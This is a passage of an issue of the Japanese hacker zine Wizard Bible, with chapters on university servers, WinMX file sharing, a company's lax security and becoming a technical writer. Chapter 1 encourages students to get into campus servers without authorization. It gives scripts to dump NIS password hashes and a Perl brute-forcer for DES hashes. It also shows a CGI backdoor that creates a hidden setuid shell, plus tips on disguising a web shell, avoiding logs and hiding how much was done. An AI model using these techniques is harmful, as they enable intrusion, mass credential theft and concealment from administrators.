[-]=======================================================================[-] Wizard Bible [-]=======================================================================[-] x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ---- 第0章:目次 --- x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ○第1章:Geekの為の楽しい大学生活 PaiN 著 ○第2章:WinMX Tips 黒猫 著 ○第3章:セキュリティの認識が甘い企業の話 D 著 ○第4章:目指せPCテクニカルライター[第一回] MaD 著 ○第5章:MACアドレス再考 IPUSIRON 著 ○第6章:お知らせ ○第7章:著者プロフィール x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x --- 第1章:Geekの為の楽しい大学生活 --- 著者:PaiN x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ■0x01.) 初めに  えー、全くHotな話題ではありませんが、今回は大学生、特に新入学生に向ける 学内サーバの楽しみ方を書いていきます。  大学のような巨大ネットワークに自由に出入りできる機会は卒業したら無いかも しれません。今うちに楽しんでおきましょう。  大学生になったから「ハッカー甲子園」に出れなかった君。大学には人為的にセ キュリティーホール(設定ミスとも読む)が数多く開けられています。ハッカー甲 子園に出場できなかった欲求を退学にならない程度に大学で発散させましょう。  何を楽しむかは人それぞれです。セキュリティーに興味があるならセキュリティ ー上の問題を探し、チャットが趣味なら学校のサーバをチャットサーバにして夜々 会話を楽しむ、友達とファイル交換する等、楽しみ方は様々です。  もし、基礎知識が無ければ,まずはLinuxとプラットホームに依存しないプログラ ミング言語1つを修得することを勧めます。これは確実に以後のPCライフを快適な ものにするからです。  この文章は去年大学へ入学した一人の学生が行ったことが、そのまま書かれてい ます。え? ありえないヨ? と思っても結構適当な管理が目立つのが大学です。某情 報系大学、N社が管理する文系T大学を題材にしています。情報系だからとか企業が 管理しているからとかは関係ありません。テキトーな奴が管理するところはテキト ーなサービスを提供します。 ■0x02.) アカウントは貰ったか?  まずは、環境設定から・・・。  君は大学からアカウントを貰っただろうか。情報系ならもちろん演習用にアカウ ントを作ってくれるだろうし、そうでない場合でもメールやWEBスペースは与えて くれるのではないだろうか。もしくれないようなら`IT革命'という死語を使って管 理者を挑発しよう。  なにをするにもアカウントは必須だ。大学はあくまで仲間だと思いたいから不正 アカウントの作成、他人のアカウント使用は避けたいのだ。  以下は大学側が与える頻度の高いアカウントの種類だ。 1. メールアカウント  これを与えないようではどうかしている。  もし、もらえない場合は理事長宛てに手紙を書こう。 2. WEBスペース(ftp)のアカウント  これは標準でない場合が多いが、申告すれば与えてくれる場合が多い。  もし、君の学校が自己申告によりアカウントを発行してくれるようなら、発行し てもらおう。その際、CGIが使えるかのチェックを忘れないように。大学のサーバ でCGIを使わせてくれるということは、shellアカウント発行するのと似たようなも のだ。 3. 演習室のWindowsログイン用アカウント  パソコン関係の講義をするなら与えるだろう。ただ、今回はこの話はしない。私 のWindowsに関する知識が薄いからだ。WindowsサーバでのCGIの話は 0x05.) で語 ることにする。 3. shellアカウント  情報系なら、CやPerl,LISP,Prolog,Javaなんかの演習にUnix系OSを使うことだろ う。大学によっては、WindowsからTeraTermで演習用サーバにログインする場合や 、演習室のマシンにLinuxがインストールされている場合など様々だろう。 4. pppアカウント  これは微妙だ。大学によってはくれるだろう。学校がFWで守られている場合は、 pppから入れば回避できるだろうが、電話代がかかるのでやめた方がいい。  さて、これらのアカウントをどのように使っていくか考えよう。  学校が用意していない場合でもshellが使えることもあるし、CGIが使えることも ある。簡単に諦めてはいけないのだ! ■0x03.) shellが欲しいな  Linux Userとしてはshellが欲しいと思うだろう。  これがあれば大抵のことはできる。無いものは自分で書いてコンパイルすれば手 に入る環境だからだ。  既に1つ以上のshellアカウント持っている場合でも、まだまだ探す価値はある はずだ。できるだけ多くのアカウントあった方が便利だし、それだけ脆弱な管理体 制にあるサーバを発見する頻度は高いはずだ。私の場合だと、自分の学校で10-15 の常時稼働しているサーバへログインできるし、T大でも2つほどsshログインでき るサーバを発見できた。  以下簡単な捜し方を書こう。 1. メールサーバはLinuxだろ  多くの大学のメールサーバはLinuxかBSDだろう。POP3で受信するなら、そのサー バにアカウントがあるはずだ。管理が適当な場合、ここにログインできることがあ る。  これは実際、うちの学校と某T大でログインすることが出来た。  試しに、 % telnet pop.hoge-u.ac.jp % telnet pop.hoge-u.ac.jp 22 を試してみよう。上は通常のtelnetだが、これを開放しているところはまず無いだ ろう。下が重要だ。port22はsshdが走っている可能性が高い。知っているだろうが sshとはSecureShell、公開鍵暗号方式と共有鍵方式を使った所謂暗号化されたteln etだ。これはサーバ管理を業者が行っている場合、開いている確率が高いだろう。 [pain@hex51 html]$ telnet ppp.hoge-u.ac.jp 22 Trying 211.211.211.211... Connected to localhost. Escape character is '^]'. SSH-1.99-OpenSSH_3.6.1p2 となれば、sshdが稼働している。試しに`SSH-1.99-OpenSSH_3.6.1p2[ENTER]'と相 手の真似をして打ち込んでみよう。 ・$i贅歃i汪僵 =diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1ssh-rsa,ssh- dssfaes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256 -cbc,rijndael-cbc@lysator.liu.sefaes128-cbc,3des-cbc,blowfish-cbc,cast128- cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.seUhmac-md5,hma c-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96U hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96, hmac-md5-96 none,zlib などど、返って来るだろう。さすがにtelnetコマンドでsshdと通信するのは無理な ので、Linuxのsshコマンドか、Windowsの TTSSH(http://www.sakurachan.org/soft/teraterm-j/ttssh/)を使い、ログイン できないか試してみよう。  このとき使うアカウントは、もちろん自分のメールアカウントだ。パスワードは 覚えているかい? User: piyo02143 Pass: 830505 USER 学生番号、PASS 誕生日だったりするだろう。 % ssh pop.hoge-u.ac.jp -l piyo02143 piyo02143@pop's password: Last login: Wed Jul 2 04:08:18 2003 from 200.200.200.200 [piyo02143@pop hoge02143]$ とログインでたらOKだろう!! (初めてログインする場合は相手の公開鍵を保存するか尋ねられますがyesと打ち込 めばパスワードを聞いてくるはずだ)  入れなかったら諦めよう。きちんと管理しているってことだ。 2. NFSの親を当たる  これは演習室のマシンにLinuxが入っている場合、かなりの確率で有効だろう。  ユーザーのディレクトリはNFSでどこかのサーバのDiskをmountしているだろうか ら、そのmount元のサーバへはログインできる可能性が高い。  まず、演習室に行き、自分のアカウントでLinuxへログインしよう。  そして、/etc/fstabを見てみよう。 % less /etc/fstab とでもしてみると以下のような記述があるだろう。 foo:/vol/home /home nfs defaults 0 0  fooの/vol/homeを自機の/homeへmountしているってことだ。つまり、/homeの内 容はfooというマシンの/vol/homeだったのだ!  fooというのは、どれのことか調べてみよう。 % host foo hoo.hoge-u.ac.jp has address 201.201.201.201 と、正式な名称が分かったところでログインできないか試してみよう。 % ssh foo.hoge-u.ac.jp -l piyo02143 % telnet foo.hoge-u.ac.jp % ftp foo.hoge-u.ac.jp  もし、ログインできたらlastコマンドを使って、同じ学生がログインしていない か調べてみよう。もしかしたらPC中毒な先輩を発見できるかもしれない。こういう 先輩を発見したら、彼の接続元を常に監視しよう。もしかしたらまだ自分の知らな いログインできるサーバから、ログインして来る可能性があるからだ。 ■0x04.) CGIが使いたいだろ (php含む)  shellが手に入らなかった方、まだ諦めるのは早い。CGIがある。CGIは主にPerl で書いたプログラムをサーバ側で実行し、その結果をクライアントであるブラウザ に返すものだ。  よく考えてみよう。CGIが使えるということはサーバにプログラムを置いて勝手 に実行できるということだ。大学のWEBサーバはperlの制限が一切無い場合が多い のでshell並に役に立つだろう。  すでにshellアカウントある方もCGIが使えるなら、もう1つ別のアカウントが手 に入る可能性がある。suEXECされていなければCGIはhttpdの権限で動くのでCGIか らローカルなバックドアを作ってshellからそれを使用すればhttpdの権限が手に入 るのだ!! nobody, apache, webなんて名前だろう。これはファイルの所有者を適当 ユーザーで誤魔化すときに使える。  さらにmod_phpでのPHPが使える場合は、確実にhttpdの権限でプログラムが動く。 これは速度を求めるあまりhttpd自体がphpエンジンを持ち別プロセスを生成せずに httpd自体が実行するからだ。つまり同じサーバのphpは全て同じ権限で動くのであ る(他人のログファイルも別phpから編集可能ってこと)。  また、WindowsでCGIが使える場合、それが非常に大きなセキュリティ-ホールに なっていることがある。T大ではCGIからIISのアクセスログを書き換えることさえ も容易だった。  さて、CGIが使いたくなってきただろう。  次に、CGIを使う方法をあげていこう。 1. 自己申告  学校へWEBスペースを使わせてくれるように申告しよう。  その際にCGI,SSI,PHPが使用できるかきちんと聞いておこう。 2. 勝手に置いてしまいました  shellアカウントを手に入れたサーバでhttpdが動いていないか確かめてみよう。 % ps -ax | grep httpd 6042 ? S 0:00 [httpd] 6045 ? S 0:00 [httpd] と、httpdが動いているようならhttpd.conf (/etc/httpd/conf/httpd.conf or /usr/local/httpd/conf/httpd.conf辺り) を確認してhttpdのホームを確かめよう。大体が/home/httpd/だろう。  そして、/home/httpd/cgi-bin/はCGIが稼働できるディレクトリだ。そこへ行っ て書き込み可能なディレクトリが無いか探してみよう。もし、配布されているBBS なんかを設置している場合は、lockやdat,logと言ったPermission 0777なディレク トリを置いている管理人も稀にいるのだ。そこへ勝手にbbs.cgiと名をつけたCGI置 いてしまおう。ただ、access_logに残るのであまり頻繁に実行してはダメだ。使っ た後はbbs.cgiをすぐに消しておこう。 ■0x05.) セキュリティ上の問題を探せ  さて、やっと本題に来ました。  暇になったら学校のサーバのセキュリティ-チェックをやってみよう。思いもよ らぬ人為的ミス(?)やシステムの根本的な設計ミスなど発見できるだろう。一応自 分の学校なので、他人の書いたbofなexploit等は使わないようにしよう。あくまで 自分の能力の範囲で管理者のミスを探すという遊びだ。 1. NISからユーザー情報を取得できたら(Linux/Shell/CGI)  膨大な学生のアカウントを多数のマシンで管理するのは大変だ。そこで管理者は NISを使い、特定のサーバのユーザー情報を別のマシンはmountする形で使用するだ ろう。  このNIS(ypserver)からユーザー情報を取り出してみよう。実はこのNISは異なる アーキテクチャ間ではshadowモードが使用できないらしい。つまり、これからユー ザー情報を取り出すとshadowされていない(たぶんDES暗号化された)パスワードが 手に入る可能性があるのだ。  shellアカウントがあるなら、 % ypcat passwd とやってみよう。これは演習室などのLinuxがインストールされているマシンにロ グインして行うのが良いだろう。 hoge02143:XGJDwsgcD4REI:25643:714:Foo Hoge:/home/hoge/hoge01143/:/bin/bash のような文字が大量に流れたら成功だ。問題は:で分けた2番目、`XGJDwsgcD4REI' という部分だ。これはDESという方式で暗号化されたパスワードである。これを`J ohn The Ripper'等を使いCrackすればユーザーのパスワードが分かるわけだ。もし、 ここがxだった場合はshadow化されているので、次の方法を考えてみよう。  ypcatコマンドが存在しなかった場合、以下のプログラムを試してみよう。 ----- getusr.pl #!/usr/bin/perl # getusr.pl my @info = ( ); print join(':', @info)."\n" while (@info = getpwent( )); -----  簡単だ。これはgetpwent()でシステムのユーザー情報を取得する方法だ。  CGIの場合は以下のCGIを動かしてみよう。 ----- getusr.cgi #!/usr/bin/perl print "Content-Type: text/plain\x0d\x0a\x0d\x0a"; print join(':', @info)."\n" while (@info = getpwent( )); -----  これも同じだ。初めにhttp headerを吐いておけばよい。  ちなみに、Cのプログラムならば、次のようになる。 ----- getusr.c #include #include int main(void){ struct passwd *p; while((p = getpwent()) != NULL) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); return 0; } /* EOF */ ----- % ypcat passwd > passwd や % perl getusr.pl > passwd とファイルへリダイレクトし、それを家に持ち帰ろう。その後それを提出する予定 があるのなら、それを解くプログラムを作っておくと評価が上がるだろう。  うちの学校ではこの方法で6000弱、某T大では、500弱のユーザーのパスワードが 取得解読可能だった。  ついでなので簡単なDESをCrackするプログラムを紹介しよう。  Johnは強力だが、パスワードが一定の法則(例えばhoge(誕生日))の場合、自 分でcrack用のプログラムを書いた方が早い(辞書を作る方法もあるが)。 ----- #!/usr/bin/perl my $DES = 'XGJDwsgcD4REI'; my $salt = substr($DES, 0, 2); for (my $i = 101; $i < 1232; $i++) { if (crypt(sprintf("hoge%04d", $i), $salt) eq $DES) { printf("passwd: hoge%04d\n", $i); last; } } -----  これは、hoge0101 - hoge1231 までを総当たりするものだ。簡単だろう!  DESは一方方向の暗号化なので、実際に候補となるパスワードを同じアルゴリズ ム暗号化し、すでに暗号化されているものと比べていけばいいのだ。 2. CGI,PHPからbackdoor(Linux/CGI/Shell)  これは特に問題ないように思えるが、管理者としてはあまり気持ちのいいもので はないので一応ここに書いておく。  CGIやmod_phpでのPHPは、httpdの権限で動くことが多い。もし、1つのサーバで shellアカウントとCGIが両方使える環境にあるのなら、httpdの権限を取ることが 出るだろう。これでファイルの所有者などをある程度誤魔化せるので少し大き目の ファイルを置いておく不安が減るのだ。  一番初めに思いつくのが、 ----- #!/usr/bin/perl print "Content-Type: text/plain\x0d\x0a\x0d\x0a"; system('cp /bin/sh /usr/tmp/.nobody') and print $!; system('chmod 6755 /usr/tmp/.nobody') and print $!; ----- だろう。  しかし、最近の/bin/shは実UIDでないと意味の無い場合が多い。uid=500,euid= 48だったとして/bin/shを起動するとeuidが消えてしまうのだ!! これはまずいので /bin/zshなど、この機能を持たないshellをsuidしよう。  一番確実なのは、shellモドキを自分で作っておいて、それをsuidすることだろ う。Perlの場合はsuidしたプログラムは-Uオプションでないと、かなり厳しい汚染 チェックを受けるので、うまくできない場合は#!/usr/bin/perl -Uを試してみよう。  それでもダメな場合は、CGI-Shellを使ってみよう。  これについては次項で説明する。 3. WindowsサーバでCGI可は危険? (Windows/CGI)  WindowsサーバではCGIがとても巨大なセキュリティーホールになっている場合が ある。この巨大なセキュリティホールを学生が自由に利用できるようにしているの だ!  内容はこうだ、WindowsはUnix/Linuxほどしっかりしたマルチユーザーの概念が ない(ように思える)。NTFSはファイルにアクセスできるユーザーを制限できる が、それは設定を行った場合のみ有効で、行っていない場合全てのユーザーから 読み込み可能な状態にある。ありそうにない話だが、N社が管理するT大学のIIS サーバはCGIからサーバ上のファイルが読み/書き/作成可能な状態にあった。  「CGI != 掲示板」ということだ。  以下に私が書いたサンプルプログラムを載せる。 http://hex51.darktech.org/scripts/win_nrcs.cgi.txt  ドキュメントは以下参照。 http://hex51.darktech.org/documents/nrcs.html  これはCGIをターミナルのように扱うものだ。最低限必要なコマンドはPerlで書 いているので/binが空でもPerlさえあればうまく動作するだろう。  自分で書ける人は自分の使いやすいように書いたらいいだろう。バレにくくした いならば、見た目チャットで実際にチャットとしても使えるが、名前をshellで入 室すると発言欄からコマンドが打てるようにするとバレにくいだろう!  うまくできたら、拡張子を.cgiにして設置してみよう。このときエラーでうまく 動かなかったなら.plに変更して試そう。うまく動いたなら、サーバ内探索だ。あ まり頻繁にアクセスするのは目立つので止すべきだ。  ここで1つおもしろい話をしよう(常識かもしれないが)。  一昔前に流行ったIISのUnicodeをDecodeするときに起きるセキュリティーホール を覚えているだろうか? あれは/../../の真中の/をEnccodeされたunicodeで書く ことで、WEBからはアクセスできないはずの/winnt/system32/cmd.exeを実行してサ ーバを操作するものだった。  よく考えてみよう。サーバにアカウントがあってCGIが使えるのなら自分の領域 にcmd.exeをアップロードすれば http://www.hoge-u.ac.jp/~piyo02143/cmd.exe?/c+dir 等としてコマンドが発行できるのだ。ただ、アクセスログからやっている人物がモ ロバレなのでやらないほうがいい'-) ■0x06.) 問題を発見したら報告しようか  発見したら、物分かりのいい教授にこっそり教えてあげよう。成績が良くなるか もしれないし、いい研究室に入れてくれるかもしれない。報告する人物の選択を誤 るとクラッカー扱いされるので注意しよう。初めから言い訳を考えておくのがベス トだ。  なにより、最小限の検証しか行わないこと、行ってないように見せかけること、 これが重要だ。 ■0x07.) 最後に  長くなりましたがここまでにします。  大学には、私のような単なるパソマニもいれば、ptrace/kmodのexploitを使いke rnel2.2.x-2.4.18のLinuxでrootを取りまくる奴、違法動画を大量にアップロード してサーバのHDDを満タンにしやがった奴、監視カメラを遠隔操作する奴など様々 です。  管理者は外部ばかり気にしないで内部にも気をつけましょう。  学生は、学校を仲間だと思って度を超えた悪さをするのはよしましょう。  充実した大学生活を。  では、またいつか。 x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x --- 第2章:WinMX Tips --- 著者:黒猫 x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ■0x01.) はじめに  MXをこれからはじめる方、もうはじめている方に、ちょっとした小技を紹介し ます。 ■0x01.) チャットに入ってみよう  目的は2つあります。1つは「自分の共有がどのように見えているか」を確かめる こと。  もう1つは「チャットによる情報の共有/収集」です。 ●チャットに入る前の準備  MXのチャット部屋において「Windows2000及びXPを使用している参加者のMXを強 制終了させるタグ攻撃」が開発されました。これらのOSを使っている方は、それ に対応しておく必要があります。 1:http://www.asahi-net.or.jp/~ri3a-okn/chipro/riched/riched.htmlへ行き、 「riched32.lzh」をDLして解凍します。 2:解凍して得られた「RICHED.DLL」をWinMX.exeのあるフォルダへ移動します。 3:MXを起動している場合は、MXを再起動をします。これでOKです(注1)  タグ攻撃の方法、RICHED.DLLを入れると攻撃を回避できる理由、等は下記のサ イトを参考にしてください。 http://tmp.2ch.net/test/read.cgi/download/1056723380/ ●チャット部屋に入ったら(その1:共有の確認)  どの部屋でも構いませんが、入ったら挨拶をしておきましょう。  次に、右側に出る参加者リストの中から自分を選び「参照」して見ましょう。 「自分の共有が相手にどのように見えているか」が直接わかります。自分ではき ちんと整理してあるつもりでも、案外バラバラだったり、赤共有(後述)があっ たりした場合は、もう一度共有フォルダの整理をして、できるだけ見やすくして おきましょう。  また、自分を参照したら、必ず「フルパス表示」も試してみましょう。 「C:\Documents and Settings\鈴木イチロー\My Documents\My Music」 などと出てきてしまったら、あなたの名前が相手にも伝わってしまいます。すぐ に「C:共有」などのフォルダを作り、そちらに共有したいファイルを移動して共 有フォルダを変更しておきましょう。 ●チャット部屋に入ったら(その2:情報収集)  挨拶をする等で、チャットにとけ込めたら、情報収集を開始しましょう。わか らないことはできるだけ丁寧に質問し、自分の知っていることは積極的に答えま しょう。  あなたのMXライフが変わるような、大きな情報がもらえるかも知れませんし、 あなたの情報が部屋に大歓迎されることもあり得ます。ファイルだけでなく、情 報も共有しましょう。  ただし「教えてくん」「くれくれくん」が嫌われるのは、MXチャット上でも同 じです。質問をするときは、言葉遣いに気をつけましょう。 ■0x02.) 自分の共有を見直してみよう  目的は「共有を見やすくすることにより、交換承諾率を上げる」ことです。 ●赤共有をなくそう  「赤共有」とは「DL途中のファイルの共有」です。これは「DLフォルダと共有 フォルダを同じに設定している」ことにより起こります。HNに「赤共有は無視」 と書く人もいるくらい、赤共有は嫌われますので(注2)、DLフォルダと共有フォ ルダは別々に設定しましょう。共有フォルダの変更は「共有ファイル」ボタンか らカンタンに変更できますが、DLフォルダの変更は「設定→セットアップウィザ ード」を使うことになります。とりあえずは「共有フォルダの変更」だけで良い と思います。 ●共有ファイルの名前を見直してみよう  「参照」は、ファイル名でソートされます。従って、見やすい共有にするため には、ファイル名の先頭を規則的にすることが大切です。 例: [MP3]****.mp3 [アルバム]****.zip.mp3(rar.mp3) [映画]****.avi [AV]****.mpg [アニメ]****.avi(mpg) [TV番組]****.avi(mpg) [18禁ゲーム]****.rar(zip/gca) [一般ゲーム]****.rar(zip/gca) [アプリ]****.rar(zip/gca) [情報]****.txt(html/zip/rar/gca)  大量のファイル名を一度にリネームする際は、極窓等を利用すると便利です。 リネームしたら、何度も「共有ファイル→の更新」「参照→更新」を繰り返して 「見やすくなっているか」を確認しましょう。  また、あまりに長いファイル名をつけている場合は、キューを入れてもエラー が出る場合があります。リネームした後のファイル名が長くなったときは、自分 で自分のファイルにキューを入れてみて、エラーが出ないかどうか確認しましょ う。  これで、一通りの準備ができました。MXの大海原に乗り出し、ファイル交換を 楽しんでください。 ■0x04.) まとめ ・「チャット落としタグ攻撃」に備える。 ・「チャット部屋」を利用する。 ・チャットで有用な情報を共有する。 ・「参照」で自分の共有状態を確認する ・「参照」のフルパスを見て、必要なら共有フォルダを変更する。 ・「赤共有」をなくす。 ・相手にとって見やすいファイル名にリネームする。 ・ファイル名が長すぎないか確認する。 ※ファイル交換ソフトを使うこと自体は違法ではありませんが、 交換するファイルによっては、著作権等を侵害し、犯罪になる場合があります。 共有/交換 するファイルを選ぶときは、自己責任でお願いします。 注1:これを実行すると、チャット上で文字化けすることがあります。 これは仕方がないものと割り切ってください。 注2:まれに 「相手の赤共有を見ることで、相手の欲しがっているファイルを推測し、 そのファイルを交換条件として提示することで交換承諾率を上げる」 という方法がとられる場合もありますが、現在ではまだ少数派です。 現時点では「赤共有は嫌われる」と覚えておいた方が良いでしょう。 x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x --- 第3章:セキュリティの認識が甘い企業の話 --- 著者:D x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ■0x01.) セキュリティの認識が甘い企業はまだある  2〜3年位前からビジネスにメールとインターネット閲覧がどの会社でも当た り前になっています。というか、使えなくなると仕事に弊害が起きるほど。しか も、インターネットへのアクセス回線は高速化の一途をたどっています。  「ADSLさえも入れてない会社が今時あるのか? 」そう思うことも多々あります よね。ところがあるのです。専用線(インターネット専用線ではない)と呼ばれ るものでのみネットワークを構築している会社があるのです。  そういった会社というのは本社と工場を結んでシステムを動かしていたり、音 声をその線に乗せていたりしているわけです。で、そういうところからインター ネット環境の導入の相談があって、話を聞いたところ現状のネットワークにその ままブロードバンド回線とルータを追加で設置してインターネットアクセスをし たいとのことでした。  そうなってくるとセキュリティ面の考慮が非常に必要になります。ウィルス感 染、不正アクセス、データ盗聴、・・・諸々の対策です。もちろん提案はしたわけな んですが導入費用がかかるということで、ルータのみの導入となってしまいまし た。  その後、私の言ったとおりの事象が起きてしまったわけです。  PC2台からむやみにPingが飛んでいる状態。  そう、ワーム感染です。  今まで専用線でしか使用していないネットワークだったので、スループットの いいルータというわけではなく、突然のPingアタックにルータは耐えられずに落 ちてしまう状態。  また、そうなることでシステムも使えないということで仕事もおざなりに。  ウィルス駆除ソフトを購入してもらってその場は何とかなったものの、調べた ところ有名どころのワームにトロイの木馬にetc...  ウィルス・ワームの博覧会か? というほど感染していたわけです。  このようなこともあって、その会社はウィルス駆除ソフトに併せて不正アクセ ス対応のためにファイヤウォールの導入に踏み切ったわけなんです。ネットワー クが止まったのが半日だけだったので納品等に大きな障害が起きず、問題として は比較的小さい状態でしたがこれが一日いっぱいとなると最悪、納品関係にも影 響が出て倒産に繋がる場合も考えられるわけです。  このようなことからまだ十分なセキュリティ対策を行っていない会社さんは、 大至急対策をとられたほうが無難かと思います。セキュリティの第一歩として最 低でもルータのパケットフィルタリング程度は有効にしておいて下さい。 ■0x02.) アタッカーが考えること  なぜ、そのような対策をとらなければならないか?  アタックを考える人間というのは以下の手法でネットワークに障害をもたらそ うとするためです。 1:ポートスキャンを行い、空いているポートへのアタック。  例をあげれば、POP3のポートを空けることで、第三者がメールアカウントにア タックを仕掛け、さらには他のサービスにも同じID、パスワードのアカウントを 試してみるという第2、第3の被害が発生することがあります。 2:トロイの木馬で侵入。  ウィルス対策を十分に行わなければトロイの木馬で簡単に侵入されます。 3:ワーム・ウィルスでネットワークの機能を奪う。  前述したようにクライアントPCが様々な場所へDDoS攻撃をしてしまう場合があ ります。  また、サーバに感染した場合攻撃を仕掛けるだけでなく、大事な中身を消され る場合もあります。  ・・・とまあ、ここまでであればどこのサイトを見てものっている内容ですね。  で、ルータに特化してのアタックを記載すると、 「ルータのID・パスワードはデフォルトのものを使用しているところが多い」「 安物ルータはルータにふられているグローバルIPアドレスをブラウザで開こうと すると設定画面を開いてしまう物もある」 ということです。  しかも、デフォルトのID・パスワードはルータメーカのサイトに無償でダウン ロードが出来るマニュアルに記載されている場合がほとんどです。  以上のような理由からルータに簡単にアクセスされてしまう恐れがあるため、 ルータを購入した場合はID・パスワードの変更、外部アクセスの遮断をしっかり と行いましょう。  そうしなければ、ルータに設定してあるプロバイダ情報やネットワーク情報を 難なく盗まれてしまい、それを利用して悪意を持った行為を行われてしまいます。 ■0x03.) まとめ  セキュリティに万全はありません。  日々、ネットワークの管理を怠らずに頑張ってください。 x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x --- 目指せPCテクニカルライター[第一回] --- 著者:MaD x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ■0x01.) はじめに  ちわわ、まどさんです。  久し振りの原稿依頼がきたかと思えば、ボランティアということで少しガッカ リしながらも、少しは皆さんのお役に立てそうな内容を紹介したいと思います。  小生、元ダメライター、現ボケ編集員ということで、それを活かした「目指せ PCテクニカルライター」という養成講座を数回に分けてご紹介します。  ここでご紹介する内容は、どこの出版社でも通用する内容ではないかもしれま せんが、少なからず、編集者にハッタリをカマすことはできますし、また、デー タハウスにおいてはPC系の基本フォーマットとなっているので、PC系のテク ニカルライターを目指す方にも少しは役に立つ情報になるかと思います。  皆さんもPC系のテクニカルライターとなって印税をガンガン稼いでください。 そして、企画や原稿ができたら小生に気軽に送ってみてください。  できる限り、お返事をします。  送り先:mad@data-house.co.jp ■0x02.) テクニカルライターへの近道  データハウスのPC系書籍で考えてみましょう。 「コンピュータ悪のマニュアル」から、一連のハカー系マニュアルのどれを見て も、その著者の多くはウエブサイトを持っています。  最近は、PCの普及により編集者は新人ライターをインターネット上から発掘 するケースが増えてきていますし、PC系書籍のみならず、一般書籍においても、 その傾向が増えてきています。  つまり、ウエブサイトを運営しておけば、応募などせずとも編集者から執筆の 依頼を受ける可能性が非常に高いということです。  特にPC系の書籍においては、そう文才も必要とせず、むしろ、情報の濃さや 信憑性、そして、重要なのが、まとめ方になるかと思います。つまり、テーマに 合わせた見通しのよい内容ということです。  IPUSIRON氏のセキュリティアカデメイアがそれにあたります。  もともと彼とは、なんのつながりもなく「セキュリティ」、「ハック」、「ア ングラ」といったキーワードで検索をかけていたところ、偶然ヒットしたわけで す。  そして、彼のウエブサイトを見て、企画を考え、声をかけて「ハッカーの教科 書」が産まれたわけです。お陰様で本もヒットして第二弾が発売されました。  また、他にも投稿という手段もありますが、これについても、やはり、ウエブ サイトがあれば編集者に自分の得意なジャンルを知ってもらうことができます。  そういう意味において、ある特定のジャンルを深く掘り下げた情報を発信する ウエブサイトを立ち上げることをお奨めします。 ■0x03.) 原稿のやり取りもデジタル化  これまでは、原稿用紙に原稿を書いて、それを出版社に郵送して、面談、打ち 合わせといった工程があり、初心者にとっては敷居の高いものでしたが、現在は 先にも書いた通り、PCを使ってインターネット経由で応募から入稿まで行える わけですから、そういった意味でPC系のライターは身近な職業となったように 思えます。  また、本を作る工程においても最近はPCが多く用いられています。  現状の製作においてはMacintoshがメインとなっていますが、原稿を作る著者の 場合はWindowsでまったく問題ありません。むしろ、今後はWindowsが主流になる のではないかと思われます。  また、Macintosh使いでDTPソフトを使えるのであれば、デザイナー(カバーデ ザイン・イラストデザイン・レイアウトデザイン)を目指すのもいいかもしれま せん。  PCについても、別段、ハイスペックなものは必要とせず、特にライターであ れば、かなりのロースペックマシンでも問題ありません。  逆にいえば、自分の持っている「能力と知識」だけが重要となるわけです。  小生がデータハウスで実際に使っているPCについてもロースペックな機種ば かりです。しかし、これらで全ての工程が行えます。……ちょっとしんどいです けど(汗)。  